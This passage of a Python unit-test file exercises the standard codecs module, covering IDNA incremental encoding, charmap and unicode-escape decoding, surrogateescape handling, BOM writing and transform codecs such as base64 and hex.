        self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
        self.assertEqual(decoder.decode(b"rg."), "org.")
        self.assertEqual(decoder.decode(b"", True), "")
    def test_incremental_encode(self):
        # Feeding one character at a time must match one-shot encoding.
        self.assertEqual(
            b"".join(codecs.iterencode("python.org", "idna")),
            b"python.org"
        )
        self.assertEqual(
            b"".join(codecs.iterencode("python.org.", "idna")),
            b"python.org."
        )
        self.assertEqual(
            b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
            b"xn--pythn-mua.org."
        )
        self.assertEqual(
            b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
            b"xn--pythn-mua.org."
        )
        # The incremental encoder likewise buffers until it sees "." or
        # the final=True flush.
        encoder = codecs.getincrementalencoder("idna")()
        self.assertEqual(encoder.encode("\xe4x"), b"")
        self.assertEqual(encoder.encode("ample.org"), b"xn--xample-9ta.")
        self.assertEqual(encoder.encode("", True), b"org")
        # reset() must discard any buffered partial label.
        encoder.reset()
        self.assertEqual(encoder.encode("\xe4x"), b"")
        self.assertEqual(encoder.encode("ample.org."), b"xn--xample-9ta.org.")
        self.assertEqual(encoder.encode("", True), b"")
@yp_unittest.skip_str_codecs
class CodecsModuleTest(yp_unittest.TestCase):
    """Tests for the top-level functions of the codecs module."""
    def test_decode(self):
        self.assertEqual(codecs.decode(b'\xe4\xf6\xfc', 'latin-1'),
                         '\xe4\xf6\xfc')
        self.assertRaises(TypeError, codecs.decode)
        # Default encoding is utf-8.
        self.assertEqual(codecs.decode(b'abc'), 'abc')
        self.assertRaises(UnicodeDecodeError, codecs.decode, b'\xff', 'ascii')
    def test_encode(self):
        self.assertEqual(codecs.encode('\xe4\xf6\xfc', 'latin-1'),
                         b'\xe4\xf6\xfc')
        self.assertRaises(TypeError, codecs.encode)
        self.assertRaises(LookupError, codecs.encode, "foo", "__spam__")
        # Default encoding is utf-8.
        self.assertEqual(codecs.encode('abc'), b'abc')
        self.assertRaises(UnicodeEncodeError, codecs.encode, '\xffff', 'ascii')
    def test_register(self):
        # register() requires exactly one callable argument.
        self.assertRaises(TypeError, codecs.register)
        self.assertRaises(TypeError, codecs.register, 42)
    def test_lookup(self):
        self.assertRaises(TypeError, codecs.lookup)
        self.assertRaises(LookupError, codecs.lookup, "__spam__")
        self.assertRaises(LookupError, codecs.lookup, " ")
    def test_getencoder(self):
        self.assertRaises(TypeError, codecs.getencoder)
        self.assertRaises(LookupError, codecs.getencoder, "__spam__")
    def test_getdecoder(self):
        self.assertRaises(TypeError, codecs.getdecoder)
        self.assertRaises(LookupError, codecs.getdecoder, "__spam__")
    def test_getreader(self):
        self.assertRaises(TypeError, codecs.getreader)
        self.assertRaises(LookupError, codecs.getreader, "__spam__")
    def test_getwriter(self):
        self.assertRaises(TypeError, codecs.getwriter)
        self.assertRaises(LookupError, codecs.getwriter, "__spam__")
    def test_lookup_issue1813(self):
        # Issue #1813: under Turkish locales, lookup of some codecs failed
        # because 'I' is lowercased as "ı" (dotless i)
        oldlocale = locale.setlocale(locale.LC_CTYPE)
        self.addCleanup(locale.setlocale, locale.LC_CTYPE, oldlocale)
        try:
            locale.setlocale(locale.LC_CTYPE, 'tr_TR')
        except locale.Error:
            # Unsupported locale on this system
            self.skipTest('test needs Turkish locale')
        c = codecs.lookup('ASCII')
        self.assertEqual(c.name, 'ascii')
@yp_unittest.skip_str_codecs
class StreamReaderTest(yp_unittest.TestCase):
    """Minimal StreamReader check: readlines() splits decoded text."""
    def setUp(self):
        # UTF-8 bytes for two Hangul syllables separated by a newline.
        self.reader = codecs.getreader('utf-8')
        self.stream = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
    def test_readlines(self):
        stream_reader = self.reader(self.stream)
        lines = stream_reader.readlines()
        self.assertEqual(lines, ['\ud55c\n', '\uae00'])
@yp_unittest.skip_str_codecs
class EncodedFileTest(yp_unittest.TestCase):
    """codecs.EncodedFile transcodes between its file and data encodings."""
    def test_basic(self):
        # Reading: UTF-8 bytes in the file come back re-encoded as UTF-16-LE.
        underlying = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
        wrapped = codecs.EncodedFile(underlying, 'utf-16-le', 'utf-8')
        self.assertEqual(wrapped.read(), b'\\\xd5\n\x00\x00\xae')
        # Writing: UTF-8 input data is stored as Latin-1 in the file.
        underlying = io.BytesIO()
        wrapped = codecs.EncodedFile(underlying, 'utf-8', 'latin-1')
        wrapped.write(b'\xc3\xbc')
        self.assertEqual(underlying.getvalue(), b'\xfc')
# Every text codec that the generic round-trip tests below should cover.
all_unicode_encodings = [
    "ascii",
    "big5",
    "big5hkscs",
    "charmap",
    "cp037",
    "cp1006",
    "cp1026",
    "cp1125",
    "cp1140",
    "cp1250",
    "cp1251",
    "cp1252",
    "cp1253",
    "cp1254",
    "cp1255",
    "cp1256",
    "cp1257",
    "cp1258",
    "cp424",
    "cp437",
    "cp500",
    "cp720",
    "cp737",
    "cp775",
    "cp850",
    "cp852",
    "cp855",
    "cp856",
    "cp857",
    "cp858",
    "cp860",
    "cp861",
    "cp862",
    "cp863",
    "cp864",
    "cp865",
    "cp866",
    "cp869",
    "cp874",
    "cp875",
    "cp932",
    "cp949",
    "cp950",
    "euc_jis_2004",
    "euc_jisx0213",
    "euc_jp",
    "euc_kr",
    "gb18030",
    "gb2312",
    "gbk",
    "hp_roman8",
    "hz",
    "idna",
    "iso2022_jp",
    "iso2022_jp_1",
    "iso2022_jp_2",
    "iso2022_jp_2004",
    "iso2022_jp_3",
    "iso2022_jp_ext",
    "iso2022_kr",
    "iso8859_1",
    "iso8859_10",
    "iso8859_11",
    "iso8859_13",
    "iso8859_14",
    "iso8859_15",
    "iso8859_16",
    "iso8859_2",
    "iso8859_3",
    "iso8859_4",
    "iso8859_5",
    "iso8859_6",
    "iso8859_7",
    "iso8859_8",
    "iso8859_9",
    "johab",
    "koi8_r",
    "koi8_u",
    "latin_1",
    "mac_cyrillic",
    "mac_greek",
    "mac_iceland",
    "mac_latin2",
    "mac_roman",
    "mac_turkish",
    "palmos",
    "ptcp154",
    "punycode",
    "raw_unicode_escape",
    "shift_jis",
    "shift_jis_2004",
    "shift_jisx0213",
    "tis_620",
    "unicode_escape",
    "unicode_internal",
    "utf_16",
    "utf_16_be",
    "utf_16_le",
    "utf_7",
    "utf_8",
]
# "mbcs" only exists on Windows builds.
if hasattr(codecs, "mbcs_encode"):
    all_unicode_encodings.append("mbcs")
# The following encoding is not tested, because it's not supposed
# to work:
#     "undefined"
# The following encodings don't work in stateful (stream reader/writer) mode.
broken_unicode_with_streams = [
    "punycode",
    "unicode_internal"
]
# These additionally lack working incremental encoder/decoder support.
broken_incremental_coders = broken_unicode_with_streams + [
    "idna",
]
@yp_unittest.skip_str_codecs
class BasicUnicodeTest(yp_unittest.TestCase, MixInCheckStateHandling):
    """Generic sanity checks run against every codec in all_unicode_encodings."""
    def test_basics(self):
        s = "abc123" # all codecs should be able to encode these
        for encoding in all_unicode_encodings:
            # The canonical codec name must match the lookup key
            # (modulo "_"/"-" spelling and the "_codec" suffix).
            name = codecs.lookup(encoding).name
            if encoding.endswith("_codec"):
                name += "_codec"
            elif encoding == "latin_1":
                name = "latin_1"
            self.assertEqual(encoding.replace("_", "-"), name.replace("_", "-"))
            with support.check_warnings():
                # unicode-internal has been deprecated
                (b, size) = codecs.getencoder(encoding)(s)
                self.assertEqual(size, len(s), "encoding=%r" % encoding)
                (chars, size) = codecs.getdecoder(encoding)(b)
                self.assertEqual(chars, s, "encoding=%r" % encoding)
            if encoding not in broken_unicode_with_streams:
                # check stream reader/writer: write/read one character at a
                # time and verify the character-by-character result matches.
                q = Queue(b"")
                writer = codecs.getwriter(encoding)(q)
                encodedresult = b""
                for c in s:
                    writer.write(c)
                    chunk = q.read()
                    self.assertTrue(type(chunk) is bytes, type(chunk))
                    encodedresult += chunk
                q = Queue(b"")
                reader = codecs.getreader(encoding)(q)
                decodedresult = ""
                for c in encodedresult:
                    q.write(bytes([c]))
                    decodedresult += reader.read()
                self.assertEqual(decodedresult, s, "encoding=%r" % encoding)
            if encoding not in broken_incremental_coders:
                # check incremental decoder/encoder and iterencode()/iterdecode()
                try:
                    encoder = codecs.getincrementalencoder(encoding)()
                except LookupError: # no IncrementalEncoder
                    pass
                else:
                    # check incremental decoder/encoder
                    encodedresult = b""
                    for c in s:
                        encodedresult += encoder.encode(c)
                    encodedresult += encoder.encode("", True)
                    decoder = codecs.getincrementaldecoder(encoding)()
                    decodedresult = ""
                    for c in encodedresult:
                        decodedresult += decoder.decode(bytes([c]))
                    decodedresult += decoder.decode(b"", True)
                    self.assertEqual(decodedresult, s,
                                     "encoding=%r" % encoding)
                    # check iterencode()/iterdecode()
                    result = "".join(codecs.iterdecode(
                            codecs.iterencode(s, encoding), encoding))
                    self.assertEqual(result, s, "encoding=%r" % encoding)
                    # check iterencode()/iterdecode() with empty string
                    result = "".join(codecs.iterdecode(
                            codecs.iterencode("", encoding), encoding))
                    self.assertEqual(result, "")
                if encoding not in ("idna", "mbcs"):
                    # check incremental decoder/encoder with errors argument
                    try:
                        encoder = codecs.getincrementalencoder(encoding)("ignore")
                    except LookupError: # no IncrementalEncoder
                        pass
                    else:
                        encodedresult = b"".join(encoder.encode(c) for c in s)
                        decoder = codecs.getincrementaldecoder(encoding)("ignore")
                        decodedresult = "".join(decoder.decode(bytes([c]))
                                                for c in encodedresult)
                        self.assertEqual(decodedresult, s,
                                         "encoding=%r" % encoding)
    @support.cpython_only
    def test_basics_capi(self):
        # Same incremental round-trip checks, but via the C API entry points.
        from _testcapi import codec_incrementalencoder, codec_incrementaldecoder
        s = "abc123" # all codecs should be able to encode these
        for encoding in all_unicode_encodings:
            if encoding not in broken_incremental_coders:
                # check incremental decoder/encoder (fetched via the C API)
                try:
                    cencoder = codec_incrementalencoder(encoding)
                except LookupError: # no IncrementalEncoder
                    pass
                else:
                    # check C API
                    encodedresult = b""
                    for c in s:
                        encodedresult += cencoder.encode(c)
                    encodedresult += cencoder.encode("", True)
                    cdecoder = codec_incrementaldecoder(encoding)
                    decodedresult = ""
                    for c in encodedresult:
                        decodedresult += cdecoder.decode(bytes([c]))
                    decodedresult += cdecoder.decode(b"", True)
                    self.assertEqual(decodedresult, s,
                                     "encoding=%r" % encoding)
                if encoding not in ("idna", "mbcs"):
                    # check incremental decoder/encoder with errors argument
                    try:
                        cencoder = codec_incrementalencoder(encoding, "ignore")
                    except LookupError: # no IncrementalEncoder
                        pass
                    else:
                        encodedresult = b"".join(cencoder.encode(c) for c in s)
                        cdecoder = codec_incrementaldecoder(encoding, "ignore")
                        decodedresult = "".join(cdecoder.decode(bytes([c]))
                                                for c in encodedresult)
                        self.assertEqual(decodedresult, s,
                                         "encoding=%r" % encoding)
    def test_seek(self):
        # all codecs should be able to encode these
        s = "%s\n%s\n" % (100*"abc123", 100*"def456")
        for encoding in all_unicode_encodings:
            if encoding == "idna": # FIXME: See SF bug #1163178
                continue
            if encoding in broken_unicode_with_streams:
                continue
            reader = codecs.getreader(encoding)(io.BytesIO(s.encode(encoding)))
            for t in range(5):
                # Test that calling seek resets the internal codec state and buffers
                reader.seek(0, 0)
                data = reader.read()
                self.assertEqual(s, data)
    def test_bad_decode_args(self):
        # Calling a decoder with no args, or a non-buffer arg, is a TypeError.
        for encoding in all_unicode_encodings:
            decoder = codecs.getdecoder(encoding)
            self.assertRaises(TypeError, decoder)
            if encoding not in ("idna", "punycode"):
                self.assertRaises(TypeError, decoder, 42)
    def test_bad_encode_args(self):
        # Calling an encoder with no args is a TypeError.
        for encoding in all_unicode_encodings:
            encoder = codecs.getencoder(encoding)
            with support.check_warnings():
                # unicode-internal has been deprecated
                self.assertRaises(TypeError, encoder)
    def test_encoding_map_type_initialized(self):
        from encodings import cp1140
        # This used to crash, we are only verifying there's no crash.
        table_type = type(cp1140.encoding_table)
        self.assertEqual(table_type, table_type)
    def test_decoder_state(self):
        # Check that getstate() and setstate() handle the state properly
        u = "abc123"
        for encoding in all_unicode_encodings:
            if encoding not in broken_incremental_coders:
                self.check_state_handling_decode(encoding, u, u.encode(encoding))
                self.check_state_handling_encode(encoding, u, u.encode(encoding))
@yp_unittest.skip_str_codecs
class CharmapTest(yp_unittest.TestCase):
    """Tests for codecs.charmap_decode with the three supported map types."""
    def test_decode_with_string_map(self):
        # A str map: byte value indexes into the string.
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict", "abc"),
            ("abc", 3)
        )
        # Non-BMP characters are allowed in the map.
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict", "\U0010FFFFbc"),
            ("\U0010FFFFbc", 3)
        )
        # Bytes past the end of the map, or mapped to U+FFFE, are errors.
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab"
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab\ufffe"
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab"),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab\ufffe"),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab"),
            ("ab", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab\ufffe"),
            ("ab", 3)
        )
        # An empty map with "ignore" consumes all input, producing nothing.
        allbytes = bytes(range(256))
        self.assertEqual(
            codecs.charmap_decode(allbytes, "ignore", ""),
            ("", len(allbytes))
        )
    def test_decode_with_int2str_map(self):
        # A dict map from byte value to replacement string.
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 'a', 1: 'b', 2: 'c'}),
            ("abc", 3)
        )
        # Multi-character replacements are allowed.
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 'Aa', 1: 'Bb', 2: 'Cc'}),
            ("AaBbCc", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: '\U0010FFFF', 1: 'b', 2: 'c'}),
            ("\U0010FFFFbc", 3)
        )
        # Empty-string replacement deletes the byte.
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 'a', 1: 'b', 2: ''}),
            ("ab", 3)
        )
        # Missing keys, None, and U+FFFE all mean "undefined" in strict mode.
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
                                   {0: 'a', 1: 'b'}
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
                                   {0: 'a', 1: 'b', 2: None}
        )
        # Issue #14850
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
                                   {0: 'a', 1: 'b', 2: '\ufffe'}
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: 'a', 1: 'b'}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: 'a', 1: 'b', 2: None}),
            ("ab\ufffd", 3)
        )
        # Issue #14850
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: 'a', 1: 'b', 2: '\ufffe'}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: 'a', 1: 'b'}),
            ("ab", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: 'a', 1: 'b', 2: None}),
            ("ab", 3)
        )
        # Issue #14850
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: 'a', 1: 'b', 2: '\ufffe'}),
            ("ab", 3)
        )
        allbytes = bytes(range(256))
        self.assertEqual(
            codecs.charmap_decode(allbytes, "ignore", {}),
            ("", len(allbytes))
        )
    def test_decode_with_int2int_map(self):
        # A dict map from byte value to code point ordinal.
        a = ord('a')
        b = ord('b')
        c = ord('c')
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: a, 1: b, 2: c}),
            ("abc", 3)
        )
        # Issue #15379
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: 0x10FFFF, 1: b, 2: c}),
            ("\U0010FFFFbc", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "strict",
                                  {0: sys.maxunicode, 1: b, 2: c}),
            (chr(sys.maxunicode) + "bc", 3)
        )
        # Ordinals beyond the Unicode range are a TypeError, not a decode error.
        self.assertRaises(TypeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
                                   {0: sys.maxunicode + 1, 1: b, 2: c}
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
                                   {0: a, 1: b},
        )
        self.assertRaises(UnicodeDecodeError,
            codecs.charmap_decode, b"\x00\x01\x02", "strict",
                                   {0: a, 1: b, 2: 0xFFFE},
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: a, 1: b}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "replace",
                                  {0: a, 1: b, 2: 0xFFFE}),
            ("ab\ufffd", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: a, 1: b}),
            ("ab", 3)
        )
        self.assertEqual(
            codecs.charmap_decode(b"\x00\x01\x02", "ignore",
                                  {0: a, 1: b, 2: 0xFFFE}),
            ("ab", 3)
        )
@yp_unittest.skip_str_codecs
class WithStmtTest(yp_unittest.TestCase):
    """The codecs file wrappers must be usable as context managers."""
    def test_encodedfile(self):
        raw = io.BytesIO(b"\xc3\xbc")
        with codecs.EncodedFile(raw, "latin-1", "utf-8") as ef:
            self.assertEqual(ef.read(), b"\xfc")
    def test_streamreaderwriter(self):
        raw = io.BytesIO(b"\xc3\xbc")
        utf8 = codecs.lookup("utf-8")
        with codecs.StreamReaderWriter(raw, utf8.streamreader,
                                       utf8.streamwriter, 'strict') as srw:
            self.assertEqual(srw.read(), "\xfc")
@yp_unittest.skip_str_codecs
class TypesTest(yp_unittest.TestCase):
    """Type acceptance checks for the low-level codec functions."""
    def test_decode_unicode(self):
        # Most decoders don't accept unicode input
        decoders = [
            codecs.utf_7_decode,
            codecs.utf_8_decode,
            codecs.utf_16_le_decode,
            codecs.utf_16_be_decode,
            codecs.utf_16_ex_decode,
            codecs.utf_32_decode,
            codecs.utf_32_le_decode,
            codecs.utf_32_be_decode,
            codecs.utf_32_ex_decode,
            codecs.latin_1_decode,
            codecs.ascii_decode,
            codecs.charmap_decode,
        ]
        if hasattr(codecs, "mbcs_decode"):
            decoders.append(codecs.mbcs_decode)
        for decoder in decoders:
            self.assertRaises(TypeError, decoder, "xxx")
    def test_unicode_escape(self):
        # Escape-decoding a unicode string is supported and gives the same
        # result as decoding the equivalent ASCII bytes string.
        self.assertEqual(codecs.unicode_escape_decode(r"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.unicode_escape_decode(br"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.raw_unicode_escape_decode(r"\u1234"), ("\u1234", 6))
        self.assertEqual(codecs.raw_unicode_escape_decode(br"\u1234"), ("\u1234", 6))
        # Out-of-range code points raise in strict mode, replace otherwise.
        self.assertRaises(UnicodeDecodeError, codecs.unicode_escape_decode, br"\U00110000")
        self.assertEqual(codecs.unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
        self.assertRaises(UnicodeDecodeError, codecs.raw_unicode_escape_decode, br"\U00110000")
        self.assertEqual(codecs.raw_unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class UnicodeEscapeTest(yp_unittest.TestCase):
    """Tests for the unicode-escape codec."""
    def test_empty(self):
        self.assertEqual(codecs.unicode_escape_encode(""), (b"", 0))
        self.assertEqual(codecs.unicode_escape_decode(b""), ("", 0))
    def test_raw_encode(self):
        # Printable ASCII (except backslash) passes through unchanged.
        encode = codecs.unicode_escape_encode
        for b in range(32, 127):
            if b != b'\\'[0]:
                self.assertEqual(encode(chr(b)), (bytes([b]), 1))
    def test_raw_decode(self):
        # Any byte other than backslash decodes to itself.
        decode = codecs.unicode_escape_decode
        for b in range(256):
            if b != b'\\'[0]:
                self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
    def test_escape_encode(self):
        encode = codecs.unicode_escape_encode
        check = coding_checker(self, encode)
        # Well-known control characters get their short escapes.
        check('\t', br'\t')
        check('\n', br'\n')
        check('\r', br'\r')
        check('\\', br'\\')
        # Other non-printables use \xNN; non-ASCII and astral use \uNNNN/\UNNNNNNNN.
        for b in range(32):
            if chr(b) not in '\t\n\r':
                check(chr(b), ('\\x%02x' % b).encode())
        for b in range(127, 256):
            check(chr(b), ('\\x%02x' % b).encode())
        check('\u20ac', br'\u20ac')
        check('\U0001d120', br'\U0001d120')
    def test_escape_decode(self):
        decode = codecs.unicode_escape_decode
        check = coding_checker(self, decode)
        # Backslash-newline is a line continuation (decodes to nothing).
        check(b"[\\\n]", "[]")
        check(br'[\"]', '["]')
        check(br"[\']", "[']")
        check(br"[\\]", "[\\]")
        check(br"[\a]", "[\x07]")
        check(br"[\b]", "[\x08]")
        check(br"[\t]", "[\x09]")
        check(br"[\n]", "[\x0a]")
        check(br"[\v]", "[\x0b]")
        check(br"[\f]", "[\x0c]")
        check(br"[\r]", "[\x0d]")
        # Octal escapes take up to three digits; \8 is not an escape.
        check(br"[\7]", "[\x07]")
        check(br"[\8]", r"[\8]")
        check(br"[\78]", "[\x078]")
        check(br"[\41]", "[!]")
        check(br"[\418]", "[!8]")
        check(br"[\101]", "[A]")
        check(br"[\1010]", "[A0]")
        check(br"[\x41]", "[A]")
        check(br"[\x410]", "[A0]")
        check(br"\u20ac", "\u20ac")
        check(br"\U0001d120", "\U0001d120")
        # Unknown escapes pass through with the backslash preserved.
        for b in range(256):
            if b not in b'\n"\'\\abtnvfr01234567xuUN':
                check(b'\\' + bytes([b]), '\\' + chr(b))
    def test_decode_errors(self):
        # Truncated \x, \u, \U escapes must raise in strict mode and obey
        # "ignore"/"replace" error handlers otherwise.
        decode = codecs.unicode_escape_decode
        for c, d in (b'x', 2), (b'u', 4), (b'U', 4):
            for i in range(d):
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"\\" + c + b"0"*i)
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"[\\" + c + b"0"*i + b"]")
                data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
                self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
                self.assertEqual(decode(data, "replace"),
                                 ("[\ufffd]\ufffd", len(data)))
        self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
        self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
        self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class RawUnicodeEscapeTest(yp_unittest.TestCase):
    """Tests for the raw-unicode-escape codec (only \\u and \\U are escapes)."""
    def test_empty(self):
        self.assertEqual(codecs.raw_unicode_escape_encode(""), (b"", 0))
        self.assertEqual(codecs.raw_unicode_escape_decode(b""), ("", 0))
    def test_raw_encode(self):
        # Latin-1 range characters encode to the corresponding single byte.
        encode = codecs.raw_unicode_escape_encode
        for b in range(256):
            self.assertEqual(encode(chr(b)), (bytes([b]), 1))
    def test_raw_decode(self):
        # Every byte decodes to itself.
        decode = codecs.raw_unicode_escape_decode
        for b in range(256):
            self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
    def test_escape_encode(self):
        encode = codecs.raw_unicode_escape_encode
        check = coding_checker(self, encode)
        # Backslash sequences other than \u/\U pass through untouched.
        for b in range(256):
            if b not in b'uU':
                check('\\' + chr(b), b'\\' + bytes([b]))
        check('\u20ac', br'\u20ac')
        check('\U0001d120', br'\U0001d120')
    def test_escape_decode(self):
        decode = codecs.raw_unicode_escape_decode
        check = coding_checker(self, decode)
        for b in range(256):
            if b not in b'uU':
                check(b'\\' + bytes([b]), '\\' + chr(b))
        check(br"\u20ac", "\u20ac")
        check(br"\U0001d120", "\U0001d120")
    def test_decode_errors(self):
        # Truncated \u/\U escapes must raise in strict mode and obey
        # "ignore"/"replace" error handlers otherwise.
        decode = codecs.raw_unicode_escape_decode
        for c, d in (b'u', 4), (b'U', 4):
            for i in range(d):
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"\\" + c + b"0"*i)
                self.assertRaises(UnicodeDecodeError, decode,
                                  b"[\\" + c + b"0"*i + b"]")
                data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
                self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
                self.assertEqual(decode(data, "replace"),
                                 ("[\ufffd]\ufffd", len(data)))
        self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
        self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
        self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class SurrogateEscapeTest(yp_unittest.TestCase):
    """The surrogateescape error handler round-trips undecodable bytes."""
    def test_utf8(self):
        # A lone 0x80 byte escapes to U+DC80 and back; an encoded surrogate
        # is itself undecodable, so each of its bytes escapes individually.
        for raw, escaped in [(b"foo\x80bar", "foo\udc80bar"),
                             (b"\xed\xb0\x80", "\udced\udcb0\udc80")]:
            self.assertEqual(raw.decode("utf-8", "surrogateescape"), escaped)
            self.assertEqual(escaped.encode("utf-8", "surrogateescape"), raw)
    def test_ascii(self):
        raw, escaped = b"foo\x80bar", "foo\udc80bar"
        self.assertEqual(raw.decode("ascii", "surrogateescape"), escaped)
        self.assertEqual(escaped.encode("ascii", "surrogateescape"), raw)
    def test_charmap(self):
        # 0xA5 is unassigned in ISO 8859-3.
        raw, escaped = b"foo\xa5bar", "foo\udca5bar"
        self.assertEqual(raw.decode("iso-8859-3", "surrogateescape"), escaped)
        self.assertEqual(escaped.encode("iso-8859-3", "surrogateescape"), raw)
    def test_latin1(self):
        # Escaped smuggled bytes encode back to the original byte values.
        self.assertEqual("\udce4\udceb\udcef\udcf6\udcfc".encode("latin-1", "surrogateescape"),
                         b"\xe4\xeb\xef\xf6\xfc")
@yp_unittest.skip_str_codecs
class BomTest(yp_unittest.TestCase):
    """BOM handling in codecs.open(): only one BOM per file, even after seeks."""
    def test_seek0(self):
        data = "1234567890"
        tests = ("utf-16",
                 "utf-16-le",
                 "utf-16-be",
                 "utf-32",
                 "utf-32-le",
                 "utf-32-be")
        self.addCleanup(support.unlink, support.TESTFN)
        for encoding in tests:
            # Check if the BOM is written only once
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data)
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
            # Check that the BOM is written after a seek(0)
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data[0])
                self.assertNotEqual(f.tell(), 0)
                f.seek(0)
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data)
            # (StreamWriter interface) Same check via the underlying writer.
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.writer.write(data[0])
                self.assertNotEqual(f.writer.tell(), 0)
                f.writer.seek(0)
                f.writer.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data)
            # Check that the BOM is not written after a seek() to a
            # non-zero position.
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.write(data)
                f.seek(f.tell())
                f.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
            # (StreamWriter interface) Same non-zero-seek check via the writer.
            with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
                f.writer.write(data)
                f.writer.seek(f.writer.tell())
                f.writer.write(data)
                f.seek(0)
                self.assertEqual(f.read(), data * 2)
# Bytes-to-bytes transform codecs exercised by TransformCodecTest below.
bytes_transform_encodings = [
    "base64_codec",
    "uu_codec",
    "quopri_codec",
    "hex_codec",
]
# Aliases that must resolve to the same codec (see issue #7475).
transform_aliases = {
    "base64_codec": ["base64", "base_64"],
    "uu_codec": ["uu"],
    "quopri_codec": ["quopri", "quoted_printable", "quotedprintable"],
    "hex_codec": ["hex"],
    "rot_13": ["rot13"],
}
# zlib and bz2 are optional build features; only test their codecs when
# the underlying module is available.
try:
    import zlib
except ImportError:
    zlib = None  # also used as a skip condition in TransformCodecTest
else:
    bytes_transform_encodings.append("zlib_codec")
    transform_aliases["zlib_codec"] = ["zip", "zlib"]
try:
    import bz2
except ImportError:
    pass
else:
    bytes_transform_encodings.append("bz2_codec")
    transform_aliases["bz2_codec"] = ["bz2"]
@yp_unittest.skip_str_codecs
class TransformCodecTest(yp_unittest.TestCase):
    """Tests for bytes-to-bytes transform codecs (base64, hex, uu, ...).

    Fix: the regex message patterns below contained ``\\(``/``\\)`` inside
    non-raw string literals — invalid escape sequences (DeprecationWarning
    since Python 3.6, SyntaxWarning since 3.12). They are now raw strings;
    the string values are unchanged.
    """

    def test_basics(self):
        """Round-trip every byte value through each transform codec."""
        binput = bytes(range(256))
        for encoding in bytes_transform_encodings:
            with self.subTest(encoding=encoding):
                # The codec reports how much of the input it consumed.
                (o, size) = codecs.getencoder(encoding)(binput)
                self.assertEqual(size, len(binput))
